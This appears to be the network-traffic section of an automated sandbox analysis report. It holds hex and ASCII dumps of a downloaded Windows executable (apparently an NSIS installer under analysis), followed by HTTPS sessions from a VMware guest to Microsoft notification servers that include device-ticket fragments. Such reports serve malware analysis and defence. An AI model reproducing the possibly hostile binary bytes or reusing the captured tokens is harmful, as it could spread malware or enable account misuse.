                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 06 0e 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 16 00 00 04 00 00 48 b8 13 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED]
                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8@H@@G`(`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.relocD@B
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597811937 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MM
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597826004 CET1236INData Raw: 08 40 00 00 56 83 e1 0f ff 34 8a 05 e8 c0 40 00 50 e8 a9 53 00 00 83 7c 24 08 00 8b f0 7d 06 56 e8 cd 4b 00 00 8b c6 5e c2 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 90 eb 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 90 40
                                                                                                                                                                                                                                                                            Data Ascii: @V4@PS|$}VK^USVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5Guuu@3@_^[9Guuu@uU@@Vt
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597939968 CET1236INData Raw: 40 00 eb 0d 57 68 4c 9c 40 00 c7 45 fc 01 00 00 00 e8 73 49 00 00 59 e9 49 fe ff ff 53 e8 f4 fa ff ff 8b f0 8d 45 08 50 57 68 04 20 00 00 56 ff 15 70 90 40 00 85 c0 74 24 8b 45 08 3b c6 76 29 66 39 18 74 24 56 e8 70 49 00 00 3b c3 74 0e 83 c0 2c
                                                                                                                                                                                                                                                                            Data Ascii: @WhL@EsIYISEPWh Vp@t$E;v)f9t$VpI;t,PuF3fE9]+h WWl@jMQVh SPSh@3EfjXPVDEj16EVPQ
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597953081 CET576INData Raw: 8b f8 e8 25 f6 ff ff 8b c8 8b 45 e0 83 f8 0c 77 69 ff 24 85 18 32 40 00 03 f9 eb 5e 2b f9 eb 5a 0f af f9 eb 55 3b cb 74 07 8b c7 99 f7 f9 eb 1e 33 ff c7 45 fc 01 00 00 00 eb 3f 0b f9 eb 3b 23 f9 eb 37 33 f9 eb 33 33 c0 3b fb 0f 94 c0 8b f8 eb 28
                                                                                                                                                                                                                                                                            Data Ascii: %Ewi$2@^+ZU;t3E?;#7333;(;u;t3G;u3;tWCjjYPWVH@E=@;t^H;t?;u;u"uh@CYYh jS@IPEW@V/A@
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597964048 CET1236INData Raw: 0f 84 73 f8 ff ff e9 55 f8 ff ff 6a 02 59 e8 d9 f3 ff ff 33 c9 50 41 e8 d0 f3 ff ff 50 ff 15 70 92 40 00 e9 5a 10 00 00 a1 e8 ea 47 00 03 c1 50 6a eb 33 c9 e8 b3 f3 ff ff 50 ff 15 74 92 40 00 e9 44 10 00 00 51 ff 75 f4 ff 15 70 92 40 00 8b f0 8d
                                                                                                                                                                                                                                                                            Data Ascii: sUjY3PAPp@ZGPj3Pt@DQup@EPV@EEjPEEPSSPSx@PShrV@;PD@jHjZu|@P@@PjY0PP@jYBu BE$B$h,B
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597976923 CET1236INData Raw: 1f 38 00 00 85 c0 75 07 6a 21 e8 1f ef ff ff 8b 45 e4 8b c8 c1 f9 10 51 8b c8 c1 f9 08 be ff 00 00 00 23 ce 51 23 c6 50 ff 75 f0 ff 75 f8 57 ff 75 f4 68 18 96 40 00 e8 65 3d 00 00 83 c4 20 8d 45 08 50 68 10 ac 40 00 6a 01 53 68 30 ac 40 00 ff 15
                                                                                                                                                                                                                                                                            Data Ascii: 8uj!EQ#Q#PuuWuh@e= EPh@jSh0@@;EURh @PE;EWPQPEEhpMPQ$M#tMPQR<MEQPR4Ef9t}M#WPQRDEuPQ,EuPQ9]|E
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597990036 CET1236INData Raw: 02 00 e8 4a eb ff ff 6a 33 8b f8 e8 4a ea ff ff 33 c9 66 89 0e 3b fb 0f 84 f4 ef ff ff 8d 4d bc 51 56 8d 4d 08 51 53 50 57 c7 45 bc 08 40 00 00 ff 15 1c 90 40 00 33 c9 41 85 c0 75 37 83 7d 08 04 74 1c 39 4d 08 74 06 83 7d 08 02 75 26 8b 45 e4 8b
                                                                                                                                                                                                                                                                            Data Ascii: Jj3J3f;MQVMQSPWE@@3Au7}t9Mt}u&EME3fN639]VE53fMW`hjY3f;n M9]tQVPW@SSSSMQVPW @<3f@f9V4P
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598174095 CET1236INData Raw: 75 d8 e8 a2 04 00 00 eb 18 8b 0e 8b 46 04 51 83 c6 08 56 03 c7 50 89 4d c8 e8 44 2f 00 00 03 75 c8 38 1e 75 e4 ff 75 f0 ff 15 30 91 40 00 53 8d 45 f8 50 ff 75 bc 57 ff 75 08 ff 15 54 91 40 00 57 ff 15 30 91 40 00 53 53 ff 75 08 6a ff e8 56 04 00
                                                                                                                                                                                                                                                                            Data Ascii: uFQVPMD/u8uu0@SEPuWuT@W0@SSujVEu@uuh$@3j^9]}j^up@EVu;t<Qh@R3EPh@F?39]tAjj15jPh@3E
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.598186970 CET1236INData Raw: 07 c7 45 f4 70 41 42 00 8b 45 08 3b c7 7c 0e 8b 0d f8 ea 47 00 03 c8 51 e8 a1 ff ff ff 6a 04 8d 45 14 50 e8 64 ff ff ff 85 c0 75 08 6a fd 58 e9 89 01 00 00 f7 45 14 00 00 00 80 0f 84 5b 01 00 00 8b 1d 90 90 40 00 ff d3 81 65 14 ff ff ff 7f 89 45
                                                                                                                                                                                                                                                                            Data Ascii: EpABE;|GQjEPdujXE[@eE(]C0C,CEAC=FC=FC(C(CE,@9u}uVpBWt)u=xAC5|ACE}hxAC=ACAC!BE5AC+G
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.717547894 CET1236INData Raw: 44 00 ff 5f 5e 5d c3 a1 10 c0 40 00 83 f8 ff 74 0e 50 ff 15 bc 90 40 00 83 0d 10 c0 40 00 ff e8 0d 04 00 00 6a 07 68 d0 70 4e 00 e8 19 34 00 00 c3 81 ec d4 02 00 00 53 55 56 57 6a 20 33 ed 5e 89 6c 24 18 c7 44 24 10 68 a2 40 00 89 6c 24 14 ff 15
                                                                                                                                                                                                                                                                            Data Ascii: D_^]@tP@@jhpN4SUVWj 3^l$D$h@l$0@h@U@jG6*UhGD$8PUhd@@hL@hjG'@PLW'U4@f=L"Guj"^LVP#P`@t$j [f;u


                                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            0192.168.2.64970720.198.119.143443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:03 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 6d 73 79 67 75 2f 74 6e 55 71 73 48 50 6a 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 33 37 37 33 62 62 30 38 32 66 61 35 38 65 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: 5msygu/tnUqsHPjV.1Context: 83773bb082fa58ec
                                                                                                                                                                                                                                                                            2024-12-27 06:09:03 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:03 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 6d 73 79 67 75 2f 74 6e 55 71 73 48 50 6a 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 33 37 37 33 62 62 30 38 32 66 61 35 38 65 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5msygu/tnUqsHPjV.2Context: 83773bb082fa58ec<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:03 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 6d 73 79 67 75 2f 74 6e 55 71 73 48 50 6a 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 33 37 37 33 62 62 30 38 32 66 61 35 38 65 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: 5msygu/tnUqsHPjV.3Context: 83773bb082fa58ec
                                                                                                                                                                                                                                                                            2024-12-27 06:09:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 36 67 46 7a 51 4c 52 65 4c 45 32 76 59 74 45 6d 4f 53 67 57 72 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: 6gFzQLReLE2vYtEmOSgWrg.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            1192.168.2.64971220.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 52 59 4f 64 7a 4e 73 6d 79 45 47 78 61 41 41 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 63 64 31 66 30 31 37 64 62 36 35 64 63 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: RYOdzNsmyEGxaAAI.1Context: 11cd1f017db65dcd
                                                                                                                                                                                                                                                                            2024-12-27 06:09:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:10 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 52 59 4f 64 7a 4e 73 6d 79 45 47 78 61 41 41 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 63 64 31 66 30 31 37 64 62 36 35 64 63 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: RYOdzNsmyEGxaAAI.2Context: 11cd1f017db65dcd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:10 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 52 59 4f 64 7a 4e 73 6d 79 45 47 78 61 41 41 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 63 64 31 66 30 31 37 64 62 36 35 64 63 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: RYOdzNsmyEGxaAAI.3Context: 11cd1f017db65dcd
                                                                                                                                                                                                                                                                            2024-12-27 06:09:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 74 38 39 74 56 39 46 70 45 43 34 50 44 33 5a 77 33 45 59 2b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: yt89tV9FpEC4PD3Zw3EY+g.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            2192.168.2.64971420.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:12 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 53 6c 4c 47 47 6e 71 6c 6b 6d 78 44 38 32 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 35 31 39 38 34 64 64 39 34 34 61 63 30 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: OSlLGGnqlkmxD82Z.1Context: 9451984dd944ac01
                                                                                                                                                                                                                                                                            2024-12-27 06:09:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:12 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 53 6c 4c 47 47 6e 71 6c 6b 6d 78 44 38 32 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 35 31 39 38 34 64 64 39 34 34 61 63 30 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: OSlLGGnqlkmxD82Z.2Context: 9451984dd944ac01<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:12 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 53 6c 4c 47 47 6e 71 6c 6b 6d 78 44 38 32 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 35 31 39 38 34 64 64 39 34 34 61 63 30 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: OSlLGGnqlkmxD82Z.3Context: 9451984dd944ac01<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 65 75 30 55 4b 62 37 67 58 55 47 31 48 65 78 31 64 34 58 6c 76 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: eu0UKb7gXUG1Hex1d4XlvA.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            3192.168.2.64971920.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 76 74 53 66 30 77 72 64 6a 55 2b 66 56 6d 30 72 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 36 34 66 31 31 38 37 66 34 39 38 65 33 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: vtSf0wrdjU+fVm0r.1Context: 8564f1187f498e3d
                                                                                                                                                                                                                                                                            2024-12-27 06:09:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:15 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 76 74 53 66 30 77 72 64 6a 55 2b 66 56 6d 30 72 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 36 34 66 31 31 38 37 66 34 39 38 65 33 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: vtSf0wrdjU+fVm0r.2Context: 8564f1187f498e3d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
